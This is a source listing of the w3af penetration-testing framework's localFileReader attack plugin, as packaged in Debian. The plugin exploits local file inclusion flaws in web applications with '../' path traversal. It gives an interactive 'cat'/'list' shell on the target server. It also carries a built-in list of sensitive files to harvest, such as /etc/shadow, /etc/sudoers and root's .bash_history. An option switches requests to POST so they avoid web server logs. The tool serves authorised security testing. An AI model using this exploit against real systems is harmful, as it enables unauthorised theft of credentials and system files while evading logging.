/usr/share/w3af/plugins/attack/localFileReader.py is in w3af-console 1.0-rc3svn3489-1.
This file is owned by root:root, with mode 0o644.
The actual contents of the file can be viewed below.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355 356 357 358 359 360 361 362 363 364 365 366 367 368 369 370 371 372 373 374 375 376 377 378 379 380 381 382 383 384 385 386 387 388 389 390 391 392 393 394 395 396 397 398 399 400 401 402 403 404 405 406 407 408 409 410 411 412 413 414 415 416 417 418 419 420 421 422 423 424 425 426 427 428 429 430 431 432 433 434 435 436 437 438 439 440 441 442 443 444 445 446 447 448 449 450 451 452 453 454 455 456 457 458 459 460 461 462 463 464 465 466 467 468 469 470 471 472 473 474 475 476 477 478 479 480 481 482 483 484 485 486 487 488 489 490 491 492 493 494 495 496 497 498 499 500 501 502 503 504 505 506 507 508 509 510 511 512 513 514 515 516 517 518 519 520 521 522 523 524 525 526 527 528 529 530 531 532 533 534 535 536 537 | '''
localFileReader.py
Copyright 2006 Andres Riancho
This file is part of w3af, w3af.sourceforge.net .
w3af is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation version 2 of the License.
w3af is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with w3af; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
'''
import core.controllers.outputManager as om
# options
from core.data.options.option import option
from core.data.options.optionList import optionList
from core.controllers.basePlugin.baseAttackPlugin import baseAttackPlugin
import core.data.kb.knowledgeBase as kb
import core.data.kb.vuln as vuln
from core.data.constants.common_directories import get_common_directories
from core.data.kb.shell import shell as shell
from core.controllers.w3afException import w3afException
import core.data.parsers.urlParser as urlParser
from core.data.fuzzer.fuzzer import createRandAlNum
import re
class localFileReader(baseAttackPlugin):
'''
Exploit local file inclusion bugs.
@author: Andres Riancho ( andres.riancho@gmail.com )
'''
def __init__(self):
baseAttackPlugin.__init__(self)
# Internal variables
self._already_tested = []
# User configured variables
self._changeToPost = True
self._url = ''
self._method = 'GET'
self._data = ''
self._file_pattern = ''
self._generateOnlyOne = True
def fastExploit( self ):
'''
Exploits a web app with local file include vuln.
'''
if self._url == ''or self._file_pattern == '' or self._data == '':
om.out.error('You have to configure the "url" parameter.')
else:
v = vuln.vuln()
v.setURL( self._url )
v.setMethod( self._method )
v.setDc( self._data )
v['file_pattern'] = self._file_pattern
kb.kb.append( 'localFileInclude', 'localFileInclude', v )
def getAttackType(self):
'''
@return: The type of exploit, SHELL, PROXY, etc.
'''
return 'shell'
def getVulnName2Exploit( self ):
'''
This method should return the vulnerability name (as saved in the kb) to exploit.
For example, if the audit.osCommanding plugin finds an vuln, and saves it as:
kb.kb.append( 'osCommanding' , 'osCommanding', vuln )
Then the exploit plugin that exploits osCommanding ( attack.osCommandingShell ) should
return 'osCommanding' in this method.
'''
return 'localFileInclude'
def _generateShell( self, vuln_obj ):
'''
@parameter vuln_obj: The vuln to exploit.
@return: The shell object based on the vulnerability that was passed as a parameter.
'''
# Check if we really can execute commands on the remote server
if self._verifyVuln( vuln_obj ):
if vuln_obj.getMethod() != 'POST' and self._changeToPost and \
self._verifyVuln( self.GET2POST( vuln_obj ) ):
msg = 'The vulnerability was found using method GET, but POST is being used during'
msg += ' this exploit.'
om.out.console( msg )
vuln_obj = self.GET2POST( vuln_obj )
else:
msg = 'The vulnerability was found using method GET, tried to change the method to'
msg += ' POST for exploiting but failed.'
om.out.console( msg )
# Create the shell object
shell_obj = fileReaderShell( vuln_obj )
shell_obj.setUrlOpener( self._urlOpener )
shell_obj.setCut( self._header, self._footer )
return shell_obj
else:
return None
def _verifyVuln( self, vuln_obj ):
'''
This command verifies a vuln. This is really hard work!
@return : True if vuln can be exploited.
'''
function_reference = getattr( self._urlOpener , vuln_obj.getMethod() )
try:
response = function_reference( vuln_obj.getURL(), str(vuln_obj.getDc()) )
except w3afException, e:
om.out.error( str(e) )
return False
else:
if self._defineCut( response.getBody(), vuln_obj['file_pattern'], exact=False ):
return True
else:
return False
def getOptions( self ):
'''
@return: A list of option objects for this plugin.
'''
d0 = 'If the vulnerability was found in a GET request, try to change the method to POST'
d0 += ' during exploitation.'
h0 = 'If the vulnerability was found in a GET request, try to change the method to POST'
h0 += ' during exploitation; this is usefull for not being logged in the webserver logs.'
o0 = option('changeToPost', self._changeToPost, d0, 'boolean', help=h0)
d1 = 'URL to exploit with fastExploit()'
o1 = option('url', self._url, d1, 'string')
d2 = 'Method to use with fastExploit()'
o2 = option('method', self._method, d2, 'string')
d3 = 'Data to send with fastExploit()'
o3 = option('data', self._data, d3, 'string')
d4 = 'The file pattern to search for while verifiyng the vulnerability.'
d4 += ' Only used in fastExploit()'
o4 = option('file_pattern', self._file_pattern, d4, 'string')
d5 = 'Exploit only one vulnerability.'
o5 = option('generateOnlyOne', self._generateOnlyOne, d5, 'boolean')
ol = optionList()
ol.add(o0)
ol.add(o1)
ol.add(o2)
ol.add(o3)
ol.add(o4)
ol.add(o5)
return ol
def setOptions( self, optionsMap ):
'''
This method sets all the options that are configured using the user interface
generated by the framework using the result of getOptions().
@parameter optionsMap: A dict with the options for the plugin.
@return: No value is returned.
'''
self._changeToPost = optionsMap['changeToPost'].getValue()
self._url = optionsMap['url'].getValue()
self._method = optionsMap['method'].getValue()
self._data = urlParser.getQueryString( optionsMap['data'].getValue() )
self._file_pattern = optionsMap['file_pattern'].getValue()
self._generateOnlyOne = optionsMap['generateOnlyOne'].getValue()
def getPluginDeps( self ):
'''
@return: A list with the names of the plugins that should be runned before the
current one.
'''
return []
def getRootProbability( self ):
'''
@return: This method returns the probability of getting a root shell using this attack
plugin. This is used by the "exploit *" function to order the plugins and first try to
exploit the more critical ones. This method should return 0 for an exploit that will
never return a root shell, and 1 for an exploit that WILL ALWAYS return a root shell.
'''
return 0.0
def getLongDesc( self ):
'''
@return: A DETAILED description of the plugin functions and features.
'''
return '''
This plugin exploits local file inclusion and let's you "cat" every file you want.
Remember, if the file in being read with an "include()" statement, you wont be able
to read the source code of the script file, you will end up reading the result of the
script interpretation. You can also use the "list" command to list all files inside
the known paths.
Six configurable parameters exist:
- changeToPost
- url
- method
- data
- generateOnlyOne
'''
PERMISSION_DENIED = 'Permission denied.'
NO_SUCH_FILE = 'No such file or directory.'
READ_DIRECTORY = 'Cannot cat a directory.'
FAILED_STREAM = 'Failed to open stream.'
class fileReaderShell(shell):
'''
A shell object to exploit local file include and local file read vulns.
@author: Andres Riancho ( andres.riancho@gmail.com )
'''
def help( self, command ):
'''
Handle the help command.
'''
if command == 'help':
om.out.console('')
om.out.console('Available commands:')
om.out.console(' help Display this information')
om.out.console(' cat Show the contents of a file')
om.out.console(' list List files that may be interesting.')
om.out.console(' Type "help list" for detailed information.')
om.out.console(' endInteraction Exit the shell session')
om.out.console('')
elif command == 'list':
om.out.console('')
om.out.console('list help:')
om.out.console(' The list command generates a list of the files that are available')
om.out.console(' on the remote server. If you specify the "-r" flag, the list ')
om.out.console(' process is recursive, this means that if one of the files in the')
om.out.console(' list references another file, that file is also added to the list')
om.out.console(' of available files. The "-r" flag expects an integer, which ')
om.out.console(' indicates the recursion level.')
om.out.console('')
om.out.console('Examples:')
om.out.console(' list -r 10')
om.out.console(' list')
elif command == 'cat':
om.out.console('cat help:')
om.out.console(' The cat command echoes the content of a file to the console. The')
om.out.console(' command takes only one parameter: the full path of the file to ')
om.out.console(' read.')
om.out.console('')
om.out.console('Examples:')
om.out.console(' cat /etc/passwd')
return True
def _rexec( self, command ):
'''
This method is called when a command is being sent to the remote server.
This is a NON-interactive shell. In this case, the only available command is "cat"
@parameter command: The command to send ( cat is the only supported command. ).
@return: The result of the command.
'''
# Get the command and the parameters
cmd = command.split(' ')[0]
parameters = command.split(' ')[1:]
# Select the correct handler
if cmd == 'list':
return self._list( parameters )
elif cmd == 'cat' and len(parameters) == 1:
filename = parameters[0]
return self._cat( filename )
else:
self.help( command )
return ''
def _cat( self, filename ):
'''
Read a file and echo it's content.
@return: The file content.
'''
# TODO: Review this hack
filename = '../' * 15 + filename
# Lets send the command.
function_reference = getattr( self._urlOpener , self.getMethod() )
data_container = self.getDc()
data_container[ self.getVar() ] = filename
try:
response = function_reference( self.getURL() , str(data_container) )
except w3afException, e:
return 'Error "' + str(e) + '" while sending command to remote host. Try again.'
else:
return self._filter_errors( self._cut( response.getBody() ) )
def _list( self, parameters ):
'''
Using some path disclosure problems I can make a good guess
of the full paths of all files in the webroot, this is the result of
that guess
@parameter parameters: Indicates if we have to do a recursive list or not.
'''
# Parse the parameters
recursion_level = 0
if len(parameters) == 2:
if parameters[0] == '-r' and parameters[1].isdigit():
recursion_level = int(parameters[1])
else:
self.help('list')
return ''
# Add some files that were generated by the pathDisclosure plugin
files_to_test = kb.kb.getData( 'pathDisclosure' , 'listFiles' )
# A lot of common files from a database
files_to_test.extend( self._get_common_files( self._rOS ) )
# First, we try with a non existant file, in order to have something to compare with
rand = createRandAlNum(8)
non_existant = self._cat( rand )
non_existant = non_existant.replace( rand, '')
# Define this internal variable that's going to be used in the self._list_recursive_method()
self._already_tested = []
can_read, permission_denied = self._list_recursive_method( non_existant, files_to_test, recursion_level )
tmp = can_read
tmp.extend( permission_denied )
return '\n'.join(tmp)
def _list_recursive_method(self, non_existant, files_to_test, recursion_level):
'''
This is a method that is called recursively in order to handle the
"-r" flag of the list command.
@parameter non_existant: A string that represents the response for a non existant file
@parameter files_to_test: A list with the files to test for existance
@parameter recursion_level: The recursion level, this number is decremented in each call.
@return: A tuple with two lists, one for the files we can read without any problem, and one
for the files that exist, but we don't have permission to read. Example:
(['/etc/passwd'],['/etc/shadow'])
'''
can_read = []
permission_denied = []
for path_file in files_to_test:
# Make this check to avoid double GET's
if path_file not in self._already_tested:
self._already_tested.append(path_file)
read_result = self._cat( path_file )
read_result = read_result.replace( path_file, '')
filtered_result = self._filter_errors( read_result )
if filtered_result == PERMISSION_DENIED:
spaces = 40 - len(path_file)
permission_denied.append(path_file + ' ' * spaces + PERMISSION_DENIED)
elif filtered_result not in [NO_SUCH_FILE, READ_DIRECTORY, FAILED_STREAM] and \
read_result != non_existant:
# The file exists, add it to the response
can_read.append(path_file)
# Get the files referenced by this file
referenced_files = self._get_referenced_files( path_file, filtered_result )
referenced_files = list( set(referenced_files) - set(self._already_tested) )
# Recursive stuff =)
if recursion_level and referenced_files:
tmp_read, tmp_denied = self._list_recursive_method( non_existant, referenced_files, recursion_level - 1 )
can_read.extend( tmp_read )
permission_denied.extend( tmp_denied )
# uniq
can_read = list(set(can_read))
permission_denied = list(set(permission_denied))
can_read.sort()
permission_denied.sort()
return can_read, permission_denied
def _get_referenced_files(self, path_file, file_content):
'''
@parameter path_file: The path and filename for the file that we are analyzing
@parameter file_content: The content of the file that we just read.
@return: A list of files that are referenced from the file.
'''
# Compile
regular_expressions = []
for common_dirs in get_common_directories():
regex_string = '('+common_dirs + '.*?)[:| |\0|\'|"|<|\n|\r|\t]'
regex = re.compile( regex_string, re.IGNORECASE)
regular_expressions.append(regex)
# And use
result = []
for regex in regular_expressions:
result.extend( regex.findall( file_content ) )
# uniq
result = list(set(result))
return result
def _get_common_files(self, remote_os):
'''
@return: A list of common files for the remote_os system.
'''
# TODO: maybe this should be on a different file, where all the framework
# can access it?
res = []
if remote_os == 'linux':
# Common files
res.append('/etc/passwd')
res.append('/etc/inetd.conf')
res.append('/etc/xinetd.conf')
res.append('/etc/shadow')
# Different apache configs and scripts
res.append('/etc/init.d/apache2')
res.append('/etc/init.d/apache')
res.append('/etc/apache2/httpd.conf')
res.append('/etc/httpd/httpd.conf')
res.append('/etc/apache/apache.conf')
res.append('/etc/apache/httpd.conf')
res.append('/etc/apache2/apache2.conf')
res.append('/usr/local/apache2/conf/httpd.conf')
res.append('/usr/local/apache/conf/httpd.conf')
res.append('/opt/apache/conf/httpd.conf')
res.append('/home/apache/httpd.conf')
res.append('/home/apache/conf/httpd.conf')
res.append('/etc/apache2/sites-available/default')
res.append('/etc/apache2/vhosts.d/default_vhost.include')
res.append('/etc/httpd/conf/httpd.conf')
res.append('/opt/jboss4/server/default/conf/users.properties')
# Services and stuff
res.append('/etc/crontab')
res.append('/etc/sudoers')
res.append('/etc/bash.bashrc')
res.append('/etc/fstab')
res.append('/etc/motd')
res.append('/etc/environment')
res.append('/etc/hosts.allow')
res.append('/etc/hosts.deny')
res.append('/etc/hosts')
# bash history files
res.append('/root/.bash_history')
res.append('/var/www/.bash_history')
res.append('/home/www/.bash_history')
res.append('/home/apache/.bash_history')
res.append('/home/nobody/.bash_history')
res.append('/.bash_history')
res.append('/tmp/.bash_history')
# TODO: Complete this list with windows stuff
return res
def _filter_errors( self, result ):
'''
Filter out ugly php errors and print a simple "Permission denied" or "File not found"
'''
if result.count('<b>Warning</b>'):
if result.count( 'Permission denied' ):
result = PERMISSION_DENIED
elif result.count( 'No such file or directory in' ):
result = NO_SUCH_FILE
elif result.count( 'Not a directory in' ):
result = READ_DIRECTORY
elif result.count('</a>]: failed to open stream:'):
result = FAILED_STREAM
return result
def end( self ):
'''
Cleanup. In this case, do nothing.
'''
om.out.debug('fileReaderShell cleanup complete.')
def _identifyOs( self ):
'''
Identify the remote operating system and get some remote variables to show to the user.
'''
res = self._cat('/etc/passwd')
if 'root:' in res:
self._rOS = 'linux'
else:
self._rOS = 'windows'
# This can't be determined
self._rSystem = ''
self._rSystemName = 'linux'
self._rUser = 'file-reader'
def __repr__( self ):
'''
@return: A string representation of this shell.
'''
if not self._rOS:
self._identifyOs()
return '<shell object (rsystem: "'+self._rOS+'")>'
__str__ = __repr__
def getName( self ):
'''
@return: The name of this shell.
'''
return 'localFileReader'
|